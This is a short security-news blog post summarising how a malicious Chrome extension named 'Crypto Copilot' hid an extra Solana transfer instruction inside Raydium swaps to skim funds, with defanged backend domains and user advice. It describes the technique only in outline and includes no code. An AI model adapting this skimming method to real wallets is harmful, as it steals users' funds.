top of page
Search

Hidden Danger: Chrome Extension Exploits Solana Wallets

  • Nov 27, 2025
  • 2 min read

Key Findings


  • Cybersecurity researchers have discovered a malicious Chrome extension named "Crypto Copilot" that injects hidden Solana transfer fees into Raydium swap transactions.

  • The extension silently appends an extra transfer instruction to each swap, siphoning a minimum of 0.0013 SOL or 0.05% of the trade amount to an attacker-controlled wallet.

  • The malicious behavior is concealed through obfuscation techniques, and the extension's user interface only shows the legitimate swap details, hiding the theft.

  • The extension communicates with a backend infrastructure that appears to be designed to pass Chrome Web Store review and provide a veneer of legitimacy.


Background


The "Crypto Copilot" Chrome extension was first published on May 7, 2024, by a user named "sjclark76". The developer describes the extension as offering the ability to "trade crypto directly on X with real-time insights and seamless execution."


Malicious Behavior


  • The extension injects an extra "SystemProgram.transfer" instruction into every Raydium swap transaction, sending a portion of the funds to a hardcoded attacker-controlled wallet.

  • The fee is calculated based on the amount traded, with a minimum of 0.0013 SOL or 0.05% of the swap amount if it's more than 2.6 SOL.

  • The malicious behavior is concealed through techniques like minification and variable renaming, making it difficult to detect.


Backend Infrastructure


  • The extension communicates with a backend hosted on the domain "crypto-coplilot-dashboard.vercel[.]app" to register connected wallets, fetch points and referral data, and report user activity.

  • The domain, along with "cryptocopilot[.]app," does not host any real product, indicating the illegitimate nature of the tool.

  • The extension also embeds a Helius RPC API key directly in the client code, exposing sensitive credentials that could be abused.


Impact and Mitigation


  • The hidden nature of the theft makes it difficult for users to detect, as the user interface only shows the legitimate swap details.

  • The extension remains available on the Chrome Web Store, and Socket has submitted a takedown request to Google.

  • Users are advised to exercise caution when using third-party crypto-related extensions and to carefully review transaction details before signing.


Sources


  • https://thehackernews.com/2025/11/chrome-extension-caught-injecting.html

  • https://securityonline.info/hidden-theft-crypto-copilot-chrome-extension-drains-solana-wallets-on-x/

  • https://www.reddit.com/r/SecOpsDaily/comments/1p75z59/chrome_extension_caught_injecting_hidden_solana/

  • https://x.com/TheCyberSecHub/status/1993646721377935603

  • https://www.xt.com/en/blog/post/chrome-extension-caught-injecting-hidden-solana-transfer-fees-into-raydium-swaps-the-hacker-news

  • https://www.cypro.se/2025/11/26/chrome-extension-caught-injecting-hidden-solana-transfer-fees-into-raydium-swaps/

Recent Posts

See All
Defeating AI with AI

Key Findings Generative AI and agentic AI are increasingly used by threat actors to conduct faster and more targeted attacks. One capability that AI improves for threat actors is the ability to profil

 
 
 

Comments

  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page